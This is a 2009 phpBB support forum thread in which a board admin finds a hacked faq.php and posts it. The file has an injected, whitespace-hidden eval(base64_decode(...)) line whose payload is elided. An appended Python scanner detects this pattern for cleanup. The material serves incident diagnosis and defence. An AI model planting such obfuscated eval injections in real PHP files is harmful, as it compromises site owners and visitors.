Hacked?

END OF SUPPORT: 1 January 2017 (announcement)
brushwoodnursery
Registered User
Posts: 31
Joined: Sat Jan 12, 2008 1:49 am
Location: Philly, PA USA
Contact:

Hacked?

Post by brushwoodnursery »

Never had a problem before but I was looking at my host's log reports and found a huge number of failed requests that looked like this:
[REMOVED LINK]
WARNING!!! Do not click this link unless you have protection. My WOT flagged it as a bad site so I didn't go forward. Sure seems like someone got in and mucked around. I can't FTP in to my host right now and I haven't heard back yet on my support ticket so I came here to see if this is a familiar attack and if anyone has advice on how it happened and how to clean it up.
Last edited by AdamR on Mon Sep 14, 2009 7:53 pm, edited 1 time in total.
Reason: removed link
-Dan
Using all ten thumbs, rusty scalpels and blunt instruments on PHP
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Re: Hacked?

Post by AdamR »

Something definitely isn't right there and could potentially be an attacked board.

Please file a ticket in the Incident Tracker with the following, and a team member will be able to assist you in identifying the problem and assist you in removing any harmful injections from your forum.

1) A zipped backup of your current phpBB folder.
2) A backup of your database.
3) Raw access logs from the time the issue started happening. (you may need to ask your host for these)

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton

Re: Hacked?

Post by brushwoodnursery »

Well, can't get in to file system right now. FTP and webFTP are down. Something tells me the issue isn't just our site. They usually respond quickly to support tix and I still haven't heard a word. Pulled a DB backup through the phpbb admin panel and gzipped it down but I suspect the files will be needed for the support ticket here.
-Dan

Re: Hacked?

Post by AdamR »

Not necessarily. The fileset helps, but isn't necessary. With a database backup, the Incident team can ensure there were no injections into the database. Once the site comes back online, the database can be restored (if needed) and a fresh set of phpBB files used to clean out any code injections.

As there are currently no known security vulnerabilities in phpBB 3.0.x, these incidents happen via third-party software running on the server, or trojans on administrators' computers which steal FTP credentials.

- Adam

Re: Hacked?

Post by brushwoodnursery »

Yo! Host got back to me. FTP was down. Meanwhile, studying my logs it looks like this started back in May. I opened up my faq.php file which was the one that has all of the bad referrers that look funky and it looks pretty funky itself!
Seems like this is the origin of my hack. I guess I need to change some things.

Code:

<?php
/**
*
* @package phpBB3
* @version $Id: faq.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
																	eval(base64_decode('ZXJyb     insanely huge alphanumeric string in here     UTUw+IjtleGl0KCk7fQ=='));
/**
* @ignore
*/
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);

// Start session management
$user->session_begin();
$auth->acl($user->data);
$user->setup();

$mode = request_var('mode', '');

// Load the appropriate faq file
switch ($mode)
{
	case 'bbcode':
		$l_title = $user->lang['BBCODE_GUIDE'];
		$user->add_lang('bbcode', false, true);
	break;

	default:
		$l_title = $user->lang['FAQ_EXPLAIN'];
		$user->add_lang('faq', false, true);
	break;
}

// Pull the array data from the lang pack
$help_blocks = array();
foreach ($user->help as $help_ary)
{
	if ($help_ary[0] == '--')
	{
		$template->assign_block_vars('faq_block', array(
			'BLOCK_TITLE'		=> $help_ary[1])
		);

		continue;
	}

	$template->assign_block_vars('faq_block.faq_row', array(
		'FAQ_QUESTION'		=> $help_ary[0],
		'FAQ_ANSWER'		=> $help_ary[1])
	);
}

// Lets build a page ...
$template->assign_vars(array(
	'L_FAQ_TITLE'	=> $l_title,
	'L_BACK_TO_TOP'	=> $user->lang['BACK_TO_TOP'])
);

page_header($l_title);

$template->set_filenames(array(
	'body' => 'faq_body.html')
);
make_jumpbox(append_sid("{$phpbb_root_path}viewforum.$phpEx"));

page_footer();

?>
-Dan
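
An added example, not part of the thread and not phpBB tooling: a Python scanner that flags the `eval(base64_decode('...'))` pattern shown in the posted faq.php, reporting the line, the column it was pushed out to, and a decoded preview for the incident ticket (decoded only, never executed). The function names `scan_php_source` and `scan_tree` and the sample file contents are constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Matches eval(base64_decode('...')) with either quote style and optional whitespace.
INJECTION_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)

def scan_php_source(text):
    """Return one finding per eval(base64_decode(...)) call found in text."""
    findings = []
    for match in INJECTION_RE.finditer(text):
        line_start = text.rfind("\n", 0, match.start()) + 1
        payload = "".join(match.group(2).split())
        try:
            # Decode for inspection only; the result is never executed.
            preview = base64.b64decode(payload, validate=True)[:60].decode("latin-1")
        except ValueError:
            preview = "<not valid base64>"
        findings.append({
            "line": text.count("\n", 0, match.start()) + 1,
            # A large column means the call was pushed right to hide it in an editor.
            "column": match.start() - line_start,
            "payload_len": len(payload),
            "preview": preview,
        })
    return findings

def scan_tree(root):
    """Scan every *.php file under root; return {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php_source(path.read_text(encoding="latin-1"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample mirroring the layout of the posted faq.php header; the
# payload is a harmless constructed string, not the one from the thread.
SAMPLE = (
    "<?php\n/**\n* @package phpBB3\n*/\n"
    + "\t" * 17 + "eval(base64_decode('"
    + base64.b64encode(b'echo "constructed sample";').decode() + "'));\n"
    "define('IN_PHPBB', true);\n"
)
```

Running `scan_tree` over a copy of the board's folder lists every PHP file carrying the pattern, which shows how far the injection spread before the files are replaced with a fresh set.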

Re: Hacked?

Post by AdamR »

Yes, this is a common injection that we've seen a lot of recently. Again, the team in the Incident Tracker can assist you further. :)

- Adam

Re: Hacked?

Post by brushwoodnursery »

OK, looks like the tracker form worked for me this time. It didn't like my DB gz (maybe too big) but they have the FAQ.php file contents now. Thanks for your help!
Is there a report on this injection some place so I can just go read up on it?
-Dan